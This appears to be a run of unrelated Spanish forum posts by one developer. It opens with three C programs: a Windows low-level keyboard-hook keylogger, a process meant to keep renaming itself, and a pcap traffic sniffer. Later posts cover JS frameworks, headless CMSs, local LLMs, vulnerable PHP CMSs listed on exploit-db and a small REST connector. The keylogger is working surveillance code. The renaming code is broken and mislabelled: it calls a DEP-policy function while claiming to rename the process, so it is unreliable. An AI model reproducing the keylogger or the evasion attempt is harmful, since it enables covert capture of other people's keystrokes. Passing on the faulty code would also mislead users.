¿Esto es un keylogger a bajo nivel?

#include <windows.h>
#include <stdio.h>
 
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode >= 0) {
        if (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) {
            KBDLLHOOKSTRUCT *pKey = (KBDLLHOOKSTRUCT *)lParam;
            printf("Tecla pulsada: %d\n", pKey->vkCode);
        }
    }
 
    return CallNextHookEx(NULL, nCode, wParam, lParam);
}
 
int main() {
    // Instalar el gancho de teclado
    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, 0);
    if (hook == NULL) {
        printf("Error al instalar el gancho de teclado.\n");
        return 1;
    }
 
    // Mantener el programa en ejecución
    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0) > 0) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
 
    // Desinstalar el gancho de teclado antes de salir
    UnhookWindowsHookEx(hook);
 
    return 0;
}
 

¿Y esto, es un proceso de nombre travieso?

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
 
int main() {
    srand(time(NULL)); // Inicializar la semilla para generar nombres aleatorios
 
    while (1) {
        // Generar un nuevo nombre aleatorio para el proceso
        char nuevo_nombre[256];
        sprintf(nuevo_nombre, "Proceso_%d", rand());
 
        // Obtener el identificador del proceso actual
        DWORD id_proceso = GetCurrentProcessId();
 
        // Obtener el identificador del proceso
        HANDLE h_proceso = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_SET_INFORMATION, FALSE, id_proceso);
 
        if (h_proceso != NULL) {
            // Cambiar el nombre del proceso
            if (!SetProcessDEPPolicy(0)) {
                printf("Error al cambiar el nombre del proceso. Código de error: %d\n", GetLastError());
                return 1;
            }
 
            // Restaurar el nombre del proceso utilizando un método de bajo nivel
            HMODULE kernel32 = GetModuleHandleA("kernel32.dll");
            if (kernel32 != NULL) {
                FARPROC proc = GetProcAddress(kernel32, "SetProcessInformation");
                if (proc != NULL) {
                    ((BOOL(WINAPI *)(HANDLE, DWORD, PVOID, DWORD))proc)(h_proceso, 0x1d, nuevo_nombre, strlen(nuevo_nombre) + 1);
                }
            }
 
            // Cerrar el handle del proceso
            CloseHandle(h_proceso);
        } else {
            printf("Error al obtener el identificador del proceso. Código de error: %d\n", GetLastError());
            return 1;
        }
 
        // Esperar un segundo antes de cambiar el nombre nuevamente
        Sleep(1000);
    }
 
    return 0;
}
 

No lo sé. ¿Lo son? ¿Qué otras cosas se pueden hacer? Mmmm...

¿Interceptar todo el tráfico?

#include <stdio.h>
#include <pcap.h>
 
void procesar_paquete(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
    printf("Paquete capturado, longitud: %d\n", header->len);
}
 
int main() {
    pcap_t *handle;
    char errbuf[PCAP_ERRBUF_SIZE];
 
    // Abrir la interfaz de red para capturar
    handle = pcap_open_live("\\Device\\NPF_{A6D38AA9-CCE1-49B9-BC0C-2B3C79E349E1}", 65536, 1, 1000, errbuf);
    if (handle == NULL) {
        fprintf(stderr, "Error al abrir la interfaz: %s\n", errbuf);
        return 1;
    }
 
    // Compilar y aplicar el filtro (opcional)
    struct bpf_program fp;
    char filter_exp[] = "ip"; // Filtro de ejemplo para capturar paquetes IP
    if (pcap_compile(handle, &fp, filter_exp, 0, PCAP_NETMASK_UNKNOWN) == -1) {
        fprintf(stderr, "Error al compilar el filtro: %s\n", pcap_geterr(handle));
        return 1;
    }
    if (pcap_setfilter(handle, &fp) == -1) {
        fprintf(stderr, "Error al aplicar el filtro: %s\n", pcap_geterr(handle));
        return 1;
    }
 
    // Capturar y procesar paquetes
    pcap_loop(handle, 0, procesar_paquete, NULL);
 
    // Cerrar el manejador de captura
    pcap_close(handle);
 
    return 0;
}
 
 

No sé si funcionarán. ¿Más del estilo?

He observado que React, Angular, Vuejs, son librerías JS que pueden ayudarte y ahorrarte mucho código. O sea que bien.

Pero luego he observado que te arrastran, a medida que van evolucionando, a un stack para fabricar el código final. Luego, a esos códigos, se los va pasando por tuberías. Y en eso que te están ayudando a servir más rápido el contenido, proteger el contenido, debugar pese a todo el código original, usar sintaxis alternativas o avanzadas, etc. En eso que te están dando todo eso, que está muy bien, sutilmente te arrebatan el control del flujo de desarrollo.

¿Te ha pasado? ¿Te importa, o te compensa todas estas prestaciones prefabricadas?

Lo digo porqye a mí sí. Y tardé mucho en tenerlo claro: ofrecen muchas ventajas.

Hola.

Hay muchos back-ends. Ahora están los headless CMS. No sé, si quieres montar cualquier cosa, ¿qué usas? ¿Solo prefabricados? A ver, voy a explicar bien mi caso.

Llevo años desarrollando algo que me parece de cajón. Es un PhpMyAdmin, o Adminer, pero orientado al uso final del usuario. Es decir, un back-end que me sirva de persistencia de datos de propósito general. A partir de ahí, diseñar sistemas para lo que se requiera: bibliotecas online, negocios online, tiendas online, foros, ERP, CRM, blogs,... no sé, lo que sea.

No es un drag'n'drop. Y con eso, ya sé que nunca será el más usado. Solo aspiro a poder montar cualquier tipo de sistema, de forma personalizada, y acelerando al máximo el desarrollo. No me importa tanto si es super-user-friendly, me basta con que sea fácil para el desarrollador.

Mi pregunta es qué usáis vosotros. Antaño vi que WP tenía su propia API REST. No sé ahora, pero antes era basura, y parecían no entender que el desarrollo del back debe ser data-driven (o sch3ma-driven, mejor dicho) para ahorrarte código a lo tonto.

No sé si me explico. Llevo años buscando soluciones decentes para este problema. Y al final lo acabaré aprendiendo a hacer por mí mismo.

Pero estoy seguro que hay plugins de pago, plataformas de pago, etc.

Si no me equivoco, Salesforce es el que se lleva este mercado. No sé, ¿cómo lo hacéis vosotros?

Bueno. Que eso, a mí me está espameando el chivato de moticias de Google con noticias de IA. No sé, ¿no os afecta? ¿Os da igual que haya programas que te pican una aplicación en literalmente un segundo?

No sé. Ni que sea como informáticos, no sé... algo, ALGO os tiene que afectar todo esto. Digo yo.

No sé. Si usáis LLMs en local, o solo tiráis de ChatGPT, o cómo. No sé. Pero indiferentes no... no deberíais estar. Creo yo.

Y, sobre todo, si alguien sabe leer el código fuente de estas cosas. Y alterarlo.

Hola. He estado investigando, todo huele muy mal. Pero ahora el salto cualitativo del software potencial en el mundo, desde ChatGPT y amigos, pues es decisivo, ¿no? En casi cualquier cosa que hagas, si no lleva IA, ahhh, es caca ya. ¿No? Bueno.

Yo quería saber qué herramientas hay a disposición del desarrollador pobre, para integrar IA tipo chat como ChatGPT. He intentado usar Ollama con varios modelos de su web, pero van muy lento, del estilo más de varios minutos por respuesta. Supongo que no he conseguido configurarlo bien.

En cualquier caso, ¿alguien de aquí usa estas IAs? ¿Hasta qué punto pueden configurarse para acoplarse a otro software? Uno normal, como lo de siempre. Y qué usan, si usan algo de esto. Ollama tiene una API REST para que puedas interactuar con sus modelos, y puedes crear tu propio modelo, pero bueno.

La cosa sería si alguien lo ha usado para integrarlo en sus programas, más que para sacar códigos. Yo no he podido.

Hola.

Estaba paseando por https://www.exploit-db.com/ y no sé, siempre me encuentro con CMS súperraros en PHP con fallas. Por un lado, ¿cuántos CMS vulnerables en PHP existen? ¿Dónde puedo encontrar una lista fiable? Por otro... de cada falla de software que se encuentra, ¿cuántas son de un CMS súperraro que nadie conoce de PHP?

Voy a poner una lista. Todos conocen Wordpress, Joomla, Drupal. ¿Pero estos?

Online Nurse Hiring System
Rail Pass Management System
Advanced Page Visit Counter
TASKHUB
MISP
Clinic's Patient Management System

Y esto solo de las 2 páginas primeras, en lo que llevamos de mes.

No lo sé, a lo mejor es software bueno que vale la pena probar. Pero sigo pensando que una REST automática, un headless CMS (que si lo buscas en Github: headless cms php static, no sale nada), sería más universal. Pero bueno. Aquí  pregunto sobre cuántos CMS, y de dónde salen, y quién decide si es una falla que merece documentarse.

O a lo mejor todo el mundo conoce estos softwares. Porque aunque sean de nicho, sigo pensando que no los conoce ni dios.

No sé, qué dicen ustedes.

Este está muerto, creo. Saben de más?

Hola.

Eso. ChatGPT está muy fuerte, te hace scripts de bases de datos SQL. He conseguido generar como unas 200 tablas para un ERP.

¿Tienen trucos para explotar este invento?

Hola, compañeros.

https://github.com/allnulled/restomatic-php

En 300 líneas de código, te dejo un conector de bases de datos MySQL/SQLite con una HTTP REST API.

Mi pregunta es qué hay que hacer para conseguir trabajo en este país. Y si podéis ayudarme a mejorarlo, testearlo.

¿Significa que no hay código fuente? Anda va.